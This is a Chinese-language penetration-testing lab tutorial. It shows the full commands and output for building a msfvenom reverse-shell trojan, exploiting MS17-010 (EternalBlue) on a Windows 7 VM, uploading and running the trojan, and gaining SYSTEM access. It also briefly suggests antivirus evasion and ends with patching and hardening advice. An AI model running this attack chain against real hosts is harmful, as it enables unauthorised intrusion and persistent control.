实验声明 :本文仅用于网络安全学习、攻防技术实训,严禁在未授权的设备、服务器、网络环境中进行操作,请严格遵守《网络安全法》等相关法律法规。
一、实验目标与环境
1. 实验目标
- 使用
msfvenom制作 Windows 反向连接木马程序 - 利用永恒之蓝(MS17-010)漏洞入侵 Win7 靶机
- 通过 Meterpreter 会话将木马上传至目标主机并执行
- 本地开启端口监听,反弹获取目标主机最高系统权限,实现主机控制
2. 实验环境
- 攻击机:Kali Linux 2025
- 靶机:Windows 7(未修复 MS17-010 漏洞、开启 445 端口与 SMB 服务)
- 网络环境:两台虚拟机处于同一局域网
- 攻击机 IP:
192.168.204.154 - 靶机 IP:
192.168.204.151
二、使用 msfvenom 制作反弹木马 & 配置监听
1. 生成 Windows 反弹木马
msfvenom 是 Metasploit 自带的木马生成工具,这里生成 exe 格式反弹木马:
# 语法说明:
# -p 指定载荷、LHOST 攻击机IP、LPORT 监听端口、-f 输出格式、-o 保存文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.154 LPORT=4444 -f exe -o shell_test.exe执行成功提示:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell_test.exe生成的 shell_test.exe 即为木马文件,存放于当前目录(示例:Kali 桌面)。
2. MSF 开启端口监听
木马为反向连接,需要攻击机提前监听对应端口,等待靶机主动回连:
# 静默启动 Metasploit(关闭开机动画)
msfconsole -q依次执行以下命令配置监听:
# 加载监听模块
use exploit/multi/handler
# 绑定与木马一致的载荷
set payload windows/meterpreter/reverse_tcp
# 监听本机所有网卡
set LHOST 0.0.0.0
# 监听端口(和木马 LPORT 保持一致)
set LPORT 4444
# 启动监听
run监听开启后不要关闭当前会话,保持后台等待靶机上线。
三、永恒之蓝漏洞利用 + 木马上传并执行
1. 利用 MS17-010 入侵 Win7 靶机
新开一个 Kali 终端,再次启动 msfconsole,使用永恒之蓝漏洞获取 Meterpreter 权限:
msfconsole -q
# 搜索永恒之蓝漏洞模块
search ms17-010
# 加载漏洞利用模块
use exploit/windows/smb/ms17_010_eternalblue
# 设置靶机IP
set rhost 192.168.204.151
# 执行攻击
run攻击成功后,会直接进入 meterpreter 交互界面,此时已拥有靶机系统权限。
2. 上传木马至目标主机
使用 upload 命令将 Kali 本地的木马文件,上传到 Win7 系统目录:
# 格式:upload 本地路径 靶机路径
meterpreter > upload /home/kali/Desktop/shell_test.exe C:\Windows\system32\shell_test.exe上传成功回显:
plaintext
[*] Uploading : /home/kali/Desktop/shell_test.exe -> C:\Windows\system32\shell_test.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/kali/Desktop/shell_test.exe -> C:\Windows\system32\shell_test.exe
[*] Completed : /home/kali/Desktop/shell_test.exe -> C:\Windows\system32\shell_test.exe3. 远程执行木马程序
在 Meterpreter 中调用 execute 命令运行上传的木马:
meterpreter > execute -f C:\Windows\system32\shell_test.exe出现 Process xxx created 代表木马启动成功。
四、接收反弹会话,控制靶机
回到第二步开启监听的 MSF 窗口,木马运行后会主动连接攻击机端口,成功获取新的 Meterpreter 会话:
plaintext
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (177734 bytes) to 192.168.204.151
[*] Meterpreter session 2 opened (192.168.204.154:4444 -> 192.168.204.151:49511)1. 进入 CMD 命令行
meterpreter > shell2. 解决 CMD 中文乱码
# 切换为 UTF-8 编码
chcp 650013. 查看当前权限
whoami输出 nt authority\system,代表已获取 Windows 系统最高管理员权限,实验完成。
五、常见问题与优化建议
- 木马无法回连
- 检查
LHOST、LPORT前后是否一致; - 关闭 Kali / Win7 防火墙,保证端口互通。
- 检查
- 上传文件失败
- 确认 Meterpreter 权限正常,优先上传至
C:\Windows\system32等高权限目录。
- 确认 Meterpreter 权限正常,优先上传至
- 免杀优化(拓展) 原生木马极易被杀毒软件查杀,实战中可搭配编码工具、捆绑、伪装图标等方式做免杀处理。
六、实验总结
msfvenom可以快速生成各类平台的反弹木马,反向连接模式是内网渗透常用手段。- 永恒之蓝(MS17-010)高危漏洞可直接远程拿下 Win7 系统权限,是老旧系统最主要的入侵入口之一。
- 结合漏洞提权 + 木马上传执行,可实现持久化控制,也是恶意程序传播、主机留后门的典型攻击链路。
- 安全防护建议
- 及时给 Windows 系统打全量补丁,重点修复 MS17-010 高危漏洞;
- 非办公场景关闭 139、445 等 SMB 服务端口;
- 部署杀毒软件与防火墙,拦截陌生可执行文件、异常外联;
- 定期检查系统目录下陌生 exe 文件,排查恶意后门。